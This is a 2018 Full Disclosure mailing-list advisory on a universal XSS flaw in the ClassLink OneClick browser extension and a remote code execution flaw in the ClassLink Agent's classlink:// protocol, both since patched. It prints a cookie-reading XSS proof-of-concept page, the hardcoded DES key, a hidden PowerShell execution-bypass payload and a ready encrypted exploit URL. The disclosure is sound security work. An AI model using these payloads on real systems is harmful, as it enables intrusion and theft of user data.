[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] ClassLink browser extension vulnerable to UXSS; ClassLink Agent vulnerable to Remote Code Execution.
- To: "fulldisclosure@xxxxxxxxxxxx" <fulldisclosure@xxxxxxxxxxxx>
- Subject: [FD] ClassLink browser extension vulnerable to UXSS; ClassLink Agent vulnerable to Remote Code Execution.
- From: EdTech Secure via Fulldisclosure <fulldisclosure@xxxxxxxxxxxx>
- Date: Thu, 07 Jun 2018 16:16:33 -0400
The ClassLink OneClick Browser Extension and the ClassLink Agent are vulnerable
to Universal XSS and Remote Code Execution. Vendor has released software
updates to fix both vulnerabilities on 3 June 2018.
=== Vendor ===
ClassLink: https://www.classlink.com
=== Vulnerability #1: Universal XSS through the OneClick Extension ===
To log users into websites, the ClassLink OneClick Extension injects JavaScript
into the target webpage to perform the login. To begin this flow, a user visits
a page that contains metadata about the target and the JavaScript to be
injected. This page is not authenticated, which means it can be trivially
forged by an attacker.
The extension only looks for URLs that contain the string "browsersso/". If
that is found, it looks in the "head" tag for a login_url and scripts, such as
pre_auth_script. None of these fields or the page itself are authenticated in
any way.
An attacker could create a page that contains the correct string in the URL and
include a script that goes to any website, and execute JavaScript to steal
information such as cookies, API keys, saved credentials or any private
information. This could then be posted to the attacker's server. A user simply
visiting the page would trigger the attack.
Here is a simple proof of concept:
<!doctype>
<html>
<head>
<title>.</title>
<script type="text">
appResponse: var x = {}; x.selectors = []; x.userauth = []; x.login_url =
"https://google.com";; x.pre_auth_script = "alert('XSS running on Google.
document.cookie = ' + document.cookie)"; x,
gwstokenMd5: x,
</script>
</head>
<body>.</body>
</html>
If this page is hosted at any URL that contains "browsersso/" and is visited by
a user the ClassLink OneClick Extension installed, it will automatically
navigate to Google and show an alert box with your current cookie on
https://google.com, with no user interaction. A malicious script could,
instead, post this or any other private information on the page to a remote
server.
=== Vulnerability #2: Remote Code Execution Using classlink:// URL Protocol ===
The classlink:// URL protocol allows links to launch executables or open files
on the system. This protocol is enabled by installing the ClassLink Agent.
The links contain a JSON-encoded payload encrypted using DES in ECB mode using
a static symmetric key hardcoded into the executable of "234hyg32". The payload
is not authenticated.
Because the payload is not authenticated in any way (the encryption does not
function as authentication in this context), it can be arbitrarily modified.
Since these URLs can launch executables with arbitrary parameters, it's trivial
to leverage this into a remote code execution attack through the use of things
like PowerShell or other local scripting environments included in Windows. For
example in the following payload:
{
"LocalAppLaunchType": "localapp",
"path": [
"%windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
],
"param": "-exec\" bypass -windowstyle hidden -c
\"[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');
[System.Windows.Forms.MessageBox]::Show('This is an code execution proof on
concept. The current logged in user is ' +
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name)",
"ignorepath": 0
}
This shows a proof of concept that runs a PowerShell command that will show the
currently logged in user in a message box. This example payload can be encoded
into the following URL, which will execute if clicked:
classlink:?token=d8iB7//4z+OFo5AQXymHv8lBs8SXhtBS4AZZ4M6p7nd1FQgVyBp/ajo09TdBpnqKEmVIHHBUSvug1UkzP5z/VrMNJLX1u/q4mpQZuunvtp6KuF5S+qOe4rVbgktgm99qJtcmKeYVe9YLdYse33KUz8LXyD8e7WjugE24w7CY6WBGlnMfm2T1W7Fz1JtIv4c/yu9LDkCsYivj7vxxR3LyIzaKe5DZkr3gOf5wG8QkwdrXrd2ga2/bgGWj+b11nk1OZmLqyYpDmTs/6JarhH4zvPU2foWHkOsYmUqhwDcSaVGmfA61KcGCNoIboV2H+k8FAgn4XA6aZQRMYOaCR+AgRRGAbCx0G1PUf4ipCKRVQqrrZQwN5aLRWJ7bXJllSeGDSmWDbNT/Zkleg6t7LiZSFaI2+4s8xGKRsTqgqY+BFG3MFge5tgrtv7khtDG1YaJhyyCICoXh8AlAHizRSsQG+cQ9KnwHJTvGPucfZC9h63+0OJQIVeeBrrhU1CTa6WxsowmI6b4dPGiGd4QHUAqdC6xLyeuuyIlFaHROO3Sb7JT8YZ149ItGc9MAAItr2bGy
Alternatively, this link can be clicked automatically with JavaScript, so that
visiting a web page is all that is required to trigger it. This example be
modified to run any command, like downloading another executable from a remote
source and executing it, allowing for the silent installation of malware just
by visiting an attacker controlled webpage.
Additionally, the encryption used in the payload is not sufficient for modern
use. Single DES is a deprecated standard and was withdrawn from recommended use
in October 1999. The use of ECB Mode allows for a large number of attacks
against the encrypted data itself. Also, the key size and character set do not
have enough entropy to be sufficiently strong. A simple brute force on a modest
machine could guess the key in approximately 24 hours.
=== Timeline ===
April 14th, 2018 - Reached out to vendor
May 7th, 2018 - Reply from vendor, sent disclosure
May 8th, 2018 - Vendor verified the issue and begun working on a fix
June 3rd, 2018 - Vendor confirmed fixes have been released
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/